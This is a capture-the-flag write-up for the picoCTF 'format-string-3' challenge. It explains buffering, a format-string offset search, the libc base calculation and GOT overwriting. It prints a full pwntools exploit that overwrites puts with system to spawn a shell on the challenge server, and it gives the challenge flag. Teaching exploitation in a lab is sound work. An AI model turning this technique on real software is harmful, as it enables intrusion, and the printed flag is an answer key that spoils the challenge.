Compiled by GNU CC version 13.2.1 20230801.
GCC: (GNU) 13.2.1 20230801

At first, I couldn’t run the binary, likely because I’m using a newer libc (Ubuntu 24.04) and ld than what the binary expected.

To fix this, I ran pwninit.

./format-string-3 
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f94d24313f0
hwkim301
hwkim301
/bin/sh

Buffering

You can see this code a lot when solving pwnable problems, but I usually ignored it.

I thought it would be worth explaining once.

setvbuf(stderr, NULL, _IONBF, 0);

There are 3 types of buffering (unbuffered, block buffered, and line buffered).

1. Unbuffered (_IONBF)

Information appears on the destination file or terminal as soon as it’s written.

In glibc this constant has the value 2.

2. Block buffered (_IOFBF)

Many characters are saved up and written as a block.

In glibc this constant has the value 0.

3. Line buffered (_IOLBF)

Characters are saved up until a newline is output or input is read from any stream attached to a terminal device (typically stdin).

In glibc this constant has the value 1.

Normally all files are block buffered. A stream that refers to a terminal (as stdout normally does) is line buffered, and stderr is unbuffered by default.

You can read this reddit post on why the setvbuf function is used frequently in pwnable challenges.

Exploit Explanation

The 38th argument slot holds the start of my input: it’s where 0x7025207025207025, the ASCII bytes of "%p %p %p", first shows up.

./format-string-3 
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f1bfe4e13f0
%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
0x7f1bfe63f963 0xfbad208b 0x7fff250f93e0 0x1 (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) 0x7025207025207025 0x2520702520702520 0x2070252070252070
/bin/sh

Since typing a whole bunch of %ps is inconvenient and clunky, you can automate the process of finding the offset.

I got the code from here.

from pwn import *

context.arch = "amd64"


def send_payload(payload):
    p = process("./format-string-3")
    p.sendline(payload)
    l = p.recvall()
    p.close()
    return l


offset = FmtStr(send_payload).offset
info(f"offset = {offset}")

# [*] Found format string offset: 38
# [*] offset = 38

We now know the offset. To calculate the libc base, we subtract setvbuf’s offset inside libc.so.6 from the leaked runtime address of setvbuf.

Why is that necessary when the binary isn’t compiled with PIE?

Because libc is a shared object: it is position-independent, and ASLR loads it at a different base address on every run regardless of how the main binary was built. With the base address we can compute the runtime address of any libc function, including system.
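
The base calculation is a single subtraction, plus a cheap sanity check: a correct libc base is page-aligned. In this sketch the two offsets are hypothetical placeholders; the real ones come from libc.so.6 (pwntools reads them via libc.symbols).

```python
def libc_base(leaked_addr, symbol_offset):
    # Runtime address = base + offset, so base = runtime address - offset.
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        raise ValueError("base is not page-aligned; wrong libc or offset?")
    return base

# Leak taken from the run above; both offsets are hypothetical placeholders.
SETVBUF_OFFSET = 0x7A3F0
SYSTEM_OFFSET = 0x4F760

base = libc_base(0x7F1BFE4E13F0, SETVBUF_OFFSET)
system_addr = base + SYSTEM_OFFSET
print(hex(base), hex(system_addr))
```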

checksec libc.so.6
[*] '/home/picoctf/pwn/format_string3/libc.so.6'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled

After calculating the base address of libc we need to overwrite a GOT entry of a function that will be called in the future.

puts(normal_string);

GOT & PLT

Overwriting the GOT entry of puts with the address of system in libc turns puts(normal_string) into system("/bin/sh"), which gives us a shell.

What is the GOT and PLT?

You should read this.

Explaining the GOT and PLT in detail is a bit hard for me…

In short, they are mechanisms that facilitate dynamic linking. For this exploit, we just need to know that the GOT contains the addresses of library functions, and because of Partial RELRO, we can overwrite them.

We overwrite the GOT entry of puts because puts is called right after the vulnerable printf call.

payload = fmtstr_payload(38, {e.got['puts']: libc.symbols['system']})

Another interesting point: although Python 3 has no built-in dotdict type, the pwntools ELF class exposes its symbols and GOT through one, so e.symbols['sus'], e.sym['sus'] and e.sym.sus all refer to the same address.

I think a normal dict lookup is more Pythonic since it works like any other code, but if you’re a CTFer the dot notation is a fine choice too since it reads a bit more smoothly.
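
For anyone who hasn’t seen the idea before, a dotdict is only a few lines of Python. This is a minimal sketch of the concept with a made-up symbol table, not the actual pwntools implementation:

```python
class DotDict(dict):
    """dict whose keys can also be read as attributes."""
    def __getattr__(self, name):
        try:
            return self[name]
        except KeyError:
            raise AttributeError(name) from None

# Hypothetical symbol table, just to show both access styles.
symbols = DotDict(sus=0x404060, main=0x401196)
print(hex(symbols["sus"]), hex(symbols.sus))
```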

Here’s the exploit code.

Exploit Code

from pwn import *

context.arch = "amd64"
r = remote("rhea.picoctf.net", 50053)
e = ELF("./format-string-3")
libc = ELF("./libc.so.6")
r.recvuntil(b"libc: ")
libc.address = int(r.recvline(), 16) - libc.symbols['setvbuf']
payload = fmtstr_payload(38, {e.got['puts']: libc.symbols['system']})
r.sendline(payload)
r.interactive()

# picoCTF{G07_G07?_6d11af9f}

Reference writeup + Extra Reading

ELF symbols and dotdicts in pwntools

RELRO (ReLocation Read-Only)